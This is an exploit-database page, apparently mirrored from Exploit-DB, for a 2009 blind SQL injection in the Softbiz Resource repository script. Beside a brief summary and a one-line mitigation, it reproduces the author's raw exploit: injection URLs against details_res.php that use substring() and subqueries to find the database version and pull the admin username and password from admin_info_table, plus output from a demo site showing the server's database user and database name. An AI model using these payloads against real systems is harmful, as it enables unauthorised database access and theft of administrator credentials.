header-logo
Suggest Exploit
vendor:
Softbiz Resource repository script
by:
Sangteamtham
7,5
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: Softbiz Resource repository script
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Softbiz Resource repository script Blind SQL Vulnerability (Normal version)

Softbiz Resource repository script is vulnerable to Blind SQL Injection. An attacker can exploit this vulnerability to gain access to the database and extract sensitive information. The attacker can use the substring() function to extract the version of the database and then use the same function to extract the username and password of the admin. The attacker can also use the concat() function to extract the username and password from the admin_info_table.

Mitigation:

The application should use parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$  Softbiz Resource repository script Blind SQL Vulnerability  (Normal version)            
$  Author : Sangteamtham                                                                    
$  Home  : Hcegroup.net & vnbrain.net                                                 
$  Download :http://www.softbizscripts.com/FAQ-script-features.php   
$                   					           
$******************************************************************************************
$
$ check version : /resource/details_res.php?sbres_id=[id number]+and substring(version(),1,1)=4 
$                        /resource/details_res.php?sbres_id=[id number]+and substring(version(),1,1)=5
$                        /resource/details_res.php?sbres_id=[idnumber]+and+(select+substring(concat(1,password_column),1,1)+from+admin_info_table+limit+0,1)=1/*  
$                       /resource/details_res.php?sbres_id=[idnumber]+and+(select+substring(concat(1,username_column),1,1)+from+admin_info_table+limit+0,1)=1/*
$  note: password_column,username_column,admin_info_table depend on the database installed
$***********************************************************
$ Demo: 
$ In the demo site : 
$ 
$ Exploit: 
$ http://server/resource/details_res.php?sbres_id=121%20and%20substring(@@version,1,1)=5
$ MySQL version: 5.0.81-community
$ User: softbiz_kuber@localhost
$ Dataabase: softbiz_resource

Navigation

Suggest Exploit

Services By CQR